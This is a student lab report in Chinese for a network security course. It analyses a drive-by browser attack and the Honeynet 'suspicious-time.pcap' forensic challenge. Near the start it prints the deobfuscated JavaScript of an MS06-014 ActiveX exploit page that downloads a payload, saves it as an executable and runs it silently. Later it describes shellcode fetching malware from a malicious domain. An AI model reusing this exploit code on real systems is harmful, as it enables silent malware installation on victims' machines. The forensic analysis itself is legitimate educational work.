首先使用 freshow 分析所给链接,发现里面嵌套有另一个 URL ,推测应该就是 shellcode 的链接
检查这个链接
发现该网页为了防止被杀毒软件查杀,使用了大量的空白和间隔
去除空白与间隔后(js 解密),代码如下
< html > < head > < title > < /title><script language="javascript">function NMTecHqTwlncd(o,n){var r=null;try{eval("r=o.CreateObject(n)")}catch(e){}if(!r){try{eval("r=o.CreateObject(n,'')")}catch(e){}}if(!r){try{eval("r=o.CreateObject(n,'','')")}catch(e){}}if(!r){try{eval("r=o.GetObject('',n)")}catch(e){}}if(!r){try{eval("r=o.GetObject(n,'')")}catch(e){}}if(!r){try{eval("r=o.GetObject(n)")}catch(e){}}return(r)}function uuAbyFHRrcPdFfbNYhEOQzLI(a){var s=NMTecHqTwlncd(a,"WScript.Shell");var o=NMTecHqTwlncd(a,"ADODB.Stream");var e=s.Environment("Process");var url=document.location+'/payload
';var xml=null;var bin=e.Item("TEMP")+"XHfsyzhkBIAE.exe";var dat;try{xml=new XMLHttpRequest()}catch(e){try{xml=new ActiveXObject("Microsoft.XMLHTTP")}catch(e){xml=new ActiveXObject("MSXML2.ServerXMLHTTP")}}if(!xml){return(0)}xml.open("GET",url,false);xml.send(null);dat=xml.responseBody;o.Type=1;o.Mode=3;o.Open();o.Write(dat);o.SaveToFile(bin,2);s.Run(bin,0)}function BeMvp(){var i=0;var t=new Array(' {
BD96C556 - 65A3 - 11D0 - 983A - 00C04FC29E36
}
',' {
BD96C556 - 65A3 - 11D0 - 983A - 00C04FC29E30
}
',' {
7F5B7F63 - F06F - 4331 - 8A26 - 339E03C0AE3D
}
',' {
6e32070a - 766d - 4ee6 - 879c - dc1fa91d2fc3
}
',' {
6414512B - B978 - 451D - A0D8 - FCFDF33E833C
}
',' {
06723E09 - F4C2 - 43c8 - 8358 - 09FCD1DB0766
}
',' {
639F725F - 1B2D - 4831 - A9FD - 874847682010
}
',' {
BA018599 - 1DB3 - 44f9 - 83B4 - 461454C84BF8
}
',' {
D0C07D56 - 7C69 - 43F1 - B4A0 - 25F5A11FAB19
}
',' {
E8CCCDDF - CA28 - 496b - B050 - 6C07C962476B
}
',' {
AB9BCEDD - EC7E - 47E1 - 9322 - D4A210617116
}
',' {
0006F033 - 0000 - 0000 - C000 - 000000000046
}
',' {
0006F03A - 0000 - 0000 - C000 - 000000000046
}
',null);while(t[i]){var a=null;if(t[i].substring(0,1)==' {
'){a=document.createElement("object");a.setAttribute("classid","clsid:"+t[i].substring(1,t[i].length-1))}else{try{a=new ActiveXObject(t[i])}catch(e){}}if(a){try{var b=NMTecHqTwlncd(a,"WScript.Shell");if(b){uuAbyFHRrcPdFfbNYhEOQzLI(a);return(0)}}catch(e){}}i++}}</script></head><body onload='
BeMvp()
'>EPboqnoNqNOztTdS</body></html>
可以看到调用了 document.location 加载了 payload,并且下一行中后面跟了一个可执行文件 XHfsyzhkBIAE.exe;。下面给出的那个数组比较可疑了,上网搜索果然是 ms06-14 漏洞。
2.4 取证分析挑战实践: Web 浏览器遭遇攻击
通过分析以下给出的网络记录 pcap 文件(suspicious-time.pcap Sha1 : 1f 100c8a4996fafa80d47202881a17796941fd337), 回答以下问题并撰写实践分析报告。
- 列出在捕获文件中的应用层协议类型, 你认为攻击是针对哪个或哪些协议的?
- 列出捕获文件中的 IP 地址、主机名和域名。从这些信息中你能猜出攻击场景的环境配置情况吗?
- 列出捕获文件中的所有网页页面, 其中哪些页面包含了可疑的、可能是恶意的
JavaScript 脚本代码?谁在连接这些页面?请描述恶意网页的攻击目的? - 请给出攻击者执行攻击动作的概要描述。
- 攻击者引入了哪些技巧给你的分析带来了困难,请提供在之前问题中识别的恶意
JavaScript 脚本内容,并对它们进行解码或解密。 - 攻击者的目标是哪个操作系统,哪些应用软件,哪些安全漏洞?如何阻止这些攻击?
- Shellcode 执行了哪些动作?请列出 Shellcode 的 MD5,并比较它们之间的差异?
- 在攻击场景中有二进制可执行恶意代码参与吗?它们的目的是什么?
列出在捕获文件中的应用层协议类型, 你认为攻击是针对哪个或哪些协议的?
使用 chaosreader 生成文件
查看一下数据包,没有针对 ICMP,Bootps,Netbios 或 DNS 协议的攻击。针对的协议应该是 HTTP。
列出捕获文件中的 IP 地址、主机名和域名。从这些信息中你能猜出攻击场景的环境配置情况吗?
使用命令for i in session_00[0-9]*.http.html; do srcip=`cat "$i" | grep 'http: ' | awk '{print $2}' | cut -d ':' -f1`; dstip=`cat "$i" | grep 'http: ' | awk '{print $4}' | cut -d ':' -f1`; host=`cat "$i" | grep 'Host: ' | sort -u | sed -e 's/Host: //g'`; echo "$srcip --> $dstip = $host"; done | sort –u
Rapidshare.com.eyu32.ru网站应该伪造了一个知名品牌,攻击者可能会利用它对用户进行网上钓鱼。ip 地址为 192.168.56.50
sploitme.com.cn,该名称实际上暗示着某些恶意或游戏(恶意的),网站是不存在的(未找到 DNS 域名)。ip 地址为 192.168.56.52
shop.honeynet.sg 应该是一个购物网站的服务器,是正常的。ip地址为 192.168.56.51。
honeynet.org 是另一个知名的组织网站,应该是正常的
剩下的谷歌分析网站应该也是正常的
使用命令tshark -r suspicious-time.pcap | grep 'NB.*20>' | sed -e 's/<[^>]*>//g' | awk '{print $3,$4,$10}' | sort -u
筛选出 NBNS 协议,我们知道 NBNS 协议的作用是基于 NetBIOS 名称访问的网络上提供主机名和地址映射方法,也就是提供主机名称。
这四个不同 ip 地址的主机分别映射的主机名是相同的
使用命令tshark -r suspicious-time.pcap | grep 'NB.*1e>' | sed -e 's/<[^>]*>//g' | awk '{print $3,$4,$9}' | sort -u
这四个 ip 地址的主机在同一个工作组
而通过 arp 协议筛选我们可以发现,这四个 ip 地址所对应的 mac 地址是不同的
通过上述分析,可以推断这四台主机相同的(或者克隆的),但具有四个网卡,那么攻击场景的环境应该是在 VM 环境中。
具体如下:服务:10.0.2.2, 10.0.3.2, 10.0.4.2, 10.0.5.2
(DHCP 服务和网关),192.168.1.1
(DNS 服务)。
受害者:10.0.2.15, 10.0.3.15, 10.0.4.15,10.0.5.15
。
模拟被侵入主机:192.168.56.50
( “rapidshare.com.eyu32.ru”)、192.168.56.51
(“shop.honeynet.sg”)。
攻击者:192.168.56.52
( “sploitme.com.cn”)。
列出捕获文件中的所有网页页面, 其中哪些页面包含了可疑的、可能是恶意的
JavaScript 脚本代码?谁在连接这些页面?请描述恶意网页的攻击目的?
打开session_0006.part_01.html
发现了如下界面,这应该是一个钓鱼网站,显然是恶意创建的对应的就是rapidshare.com.eyu32.ru/login.php
。
那我们找sploitme.com.cn
,发现 404 NotFound 了,这个对应文件session_0007.part_02.html
。
下面找shop.honeynet.sg/catalog/
,对应文件session_0032.part_01.html
。
请给出攻击者执行攻击动作的概要描述。
攻击者将恶意 javascript 代码注入指向sploitme.com.cn/?click=X
的隐藏iframe。当访问者查看这些页面时,它们首先被重定向到sploitme.com.cn/fg/show.php?s=X
,该页面通过302 FOUND
标头重定向到伪造的404页面(数据包63、174、366)。然后在该页面中,检查用户代理字符串,着陆点和其他参数,并(show.php)发出另一个javascript代码,该代码尝试各种攻击以在受害者的计算机中执行代码。如果任何漏洞利用成功,则客户端的计算机将下载并执行位于sploitme.com.cn/fg/load.php?e=X
的文件,恶意软件访问www.honeynet.org
。
攻击者引入了哪些技巧给你的分析带来了困难,请提供在之前问题中识别的恶意
JavaScript 脚本内容,并对它们进行解码或解密。
-
javaScript 混淆与加密,如下图所示:
-
恶意页面伪装成看起来像404页面:
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <meta name="robots" content="noindex"> <title>404 Not Found</title> </head><body> <h1>Not Found</h1> <p>The requested URL /fg/show.php was not found on this server.</p> <script language='JavaScript'> [some script] </script> <noscript></noscript> </body></html>
-
发送给受害者的漏洞利用程序取决于受害者使用的浏览器,这使得确定漏洞利用者变得更加困难
-
该漏洞利用程序不允许同一客户端访问两次。
攻击者的目标是哪个操作系统,哪些应用软件,哪些安全漏洞?如何阻止这些攻击?
首先我们追踪TCP 142号流,可以查看到这是一个针对Windows XP系统的,主要攻击目标是IE浏览器漏洞和含有ActiveX组件漏洞的。
可以通过修补操作系统和应用程序,进行定期更新以及使用“ ActiveX杀手”或完全使用其他Web浏览器来防止攻击。
Shellcode 执行了哪些动作?请列出 Shellcode 的 MD5,并比较它们之间的差异?
Shellcode获取系统临时文件路径,加载urlmon.dll
,从 URL http://sploitme.com.cn/fg/load.php?e=1
检索可执行文件,然后执行它。 Shellcode 之间的唯一区别是对load.php
脚本的请求中的e
变量,该变量指定发送恶意软件可执行文件。
在攻击场景中有二进制可执行恶意代码参与吗?它们的目的是什么?
有。目的是在受害者主机上通过 Internet Explorer 加载 www.honeynet.org
3.学习中遇到的问题及解决
- 问题1:遇到了一大堆问题,比如如何利用 Metasploit 进行混淆,比如最后一个实践如何分析等等
- 问题1解决方案:没有找到很好的解决方案,该不会的还是不会
4. 学习感想和体会
这次实验太难了,超出了自己的能力范围
参考资料
网络攻防技术与实践